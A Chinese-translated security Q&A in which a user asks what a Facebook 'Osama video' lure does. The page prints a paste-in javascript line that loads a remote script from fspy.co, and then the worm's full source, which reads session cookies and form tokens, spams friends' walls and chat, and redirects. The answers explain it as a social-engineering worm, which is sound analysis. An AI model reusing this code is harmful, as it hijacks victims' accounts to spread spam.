Facebook 垃圾邮件/网络钓鱼企图?

信息安全 攻击 javascript
2021-08-18 18:30:12

我在 Facebook 上收到了一位朋友发送的消息,但我认为这不是一条真实的消息:

___ shared a link on your Wall. 
This will leave you speechless) 
http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668 
Osama Bin Laden Death Video! 
Navy Seals raid Bin Ladens hideout and execute him!

在那里它给出了一条消息,在地址栏中键入以下内容:

javascript:(a=(b=document).createElement('script')).src='//fspy.co/o.js?'+Math.random(),b.body.appendChild(a);void(0)

我检查了这个 fspy.co/o.js 文件,它的内容如下。

我试图了解这个脚本的作用。这里有人有更多见解吗?///////////////////////////////////////// ///////////////////////////////////////// ////////// // KuNG FU JS v.1 20yrsplus.info /////////////////////// ///////////////////////////////////////// ////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {

    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?",
               "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?"
              );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

    if(http1.readyState == 4 && http1.status == 200) { // If state = success

        var response1 = http1.responseText;

        response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
        response1 = JSON.parse(response1); // Convert the response to JSON

        //alert(response4.toSource());

        var count = 0;

        for(uid in response1.payload.entries){

            if(count < 400){

                //alert("SENT TO "+response1.payload.entries[count].uid);

                // Loop to send messages

                // New XMLHttp object
                var httpwp = new XMLHttpRequest();

                var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
                var randLink = new Array("http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?", "http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?");
                var statusmessage="This will leave you speechless";
                var title="Osama Bin Laden Death Video!";
//              var link="http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?http://www.facebook.com/pages/Osama-Bin-Laden-Killed-Leaked-Video/185837861463668?";
                var link = randLink[Math.floor(randLink.length*Math.random())];
                var description="Navy Seals raid Bin Ladens hideout and execute him! ";
                var picture="http://cooldadssz.co.cc/laden.png";

                var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";

                httpwp.open("POST", urlwp, true);

                //Send the proper header information along with the request

                httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpwp.setRequestHeader("Content-length", paramswp.length);
                httpwp.setRequestHeader("Connection", "keep-alive");                    

                httpwp.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpwp.readyState == 4 && httpwp.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }

                }

                httpwp.send(paramswp);

            }

            count++; // increment counter

        }

        http1.close; // Close the connection



    }

}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
    if(http3.readyState == 4 && http3.status == 200) {

        var response3 = http3.responseText;

        response3 = response3.replace("for (;;);", "");
        response3 = JSON.parse(response3);

        var count = 0;

        for(property in response3.payload.buddy_list.nowAvailableList){

            if(count < 100){

                // Loop to send messages

                // New XMLHttp object
                var httpc = new XMLHttpRequest();

                // Generate random message ID

                var msgid = Math.floor(Math.random()*1000000);

                var time = Math.round(new Date().getTime() / 1000);

                var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
                var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
                httpc.open("POST", urlc, true);

                //Send the proper header information along with the request
                httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                httpc.setRequestHeader("Content-length", paramsc.length);
                httpc.setRequestHeader("Connection", "close");

                httpc.onreadystatechange = function() { //Call a function when the state changes.
                    if(httpc.readyState == 4 && httpc.status == 200){
                        //alert(http.responseText);
                        //alert('buddy list fetched');
                    }
                }
                httpc.send(paramsc);

            }

            //alert(property);
            count++; // increment counter

        }

        http3.close; // Close the connection

    }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {

        http4.close; // Close the connection

    }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
    if(http5.readyState == 4 && http5.status == 200) {

        http5.close; // Close the connection

    }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none";
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
var endArray = new Array("http://fspy.co/", "http://fspy.co/", "http://fspy.co/", "http://fspy.co/");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://fbview.net/osama.html';", 15000);
3个回答

该代码注释很好,实际上它有太多注释:

计数++;// 递增计数器

列出了它的所有主要功能及其非常简单的代码。它的行为很像Samy 蠕虫,但它使用的是社会工程而不是 xss。

据我了解,最重要的部分是它检索您的 facebook cookie user_id,与您的在线朋友打开一个聊天框,将您注册到一个 FB 组,等等。如果您开始自己将这段代码编写到不同的上下文中,一步一步地,您可以看到 http 连接在做什么。

代码paramsc中的某些部分(如变量)可能没有意义,因为它们具有特定于 facebook 的形式。要了解这些变量,请在 FB 中执行“加入组”之类的操作,在浏览器中查看标题,然后复制它,并替换您想要的部分。这并不难。它可以明确地变得更加安全。他们可能会做很多事情来避免这种情况,但我想他们并没有为此做好准备。人们迫切需要这些链接突然泛滥。

似乎很难抗争,因为团体希望将链接发送给朋友加入他们,而不是让这些链接随着时间的推移而改变,并且只需单击一下即可完成。此外,它们必须通过简单地将它们放入电子邮件并单击,您就可以工作,并且使用有效的 cookie 就不需要其他任何东西了。所以有取舍。我想知道他们会做什么。我敢打赌FB现在正在为此失眠。

关于 SO -防止 Osama Facebook 蠕虫的更多讨论

这应该很容易防止 - 它依赖于用户实际复制和粘贴他们不理解的命令。

缺点是 - “足够多的人足够愚蠢”因此它传播开来。

所以从你的问题的标题来看 - 是的,这是公然的攻击

而且我认为@Vass 解释了足够的工作原理

其它你可能感兴趣的问题
上一篇xml 库漏洞,关于后期利用 下一篇Azure ACS 2.0 安全功能与 ADFS 2.0 相比如何?